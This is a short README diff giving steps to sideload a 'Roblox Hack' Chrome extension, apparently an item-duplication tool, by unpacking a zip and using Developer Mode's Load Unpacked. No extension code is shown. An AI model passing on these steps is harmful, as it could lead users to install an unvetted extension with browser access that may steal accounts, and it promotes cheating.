robloxluck/robloxdupe/README.md

 Follow these steps to install the Roblox Hack extension:

-1. Download the `.crx` file:
+1. Download the `.zip` file:
-   - Locate the roblox-hack.crx file in this repository.
+   - Locate the roblox-addons.zip file in this repository.
+   - Download file and unpack this

 2. Enable Developer Mode in Chrome:
    - Open Chrome and navigate to chrome://extensions/.
    - Toggle the Developer Mode switch in the top-right corner.

 3. Load the Extension:
-   - Drag and drop the roblox-hack.crx file into the Chrome Extensions page.
+   - Click load Unpacked and select  dupe folder into the Chrome Extensions page.

 4. Confirm Installation:
    - When prompted, click Add Extension to complete the installation.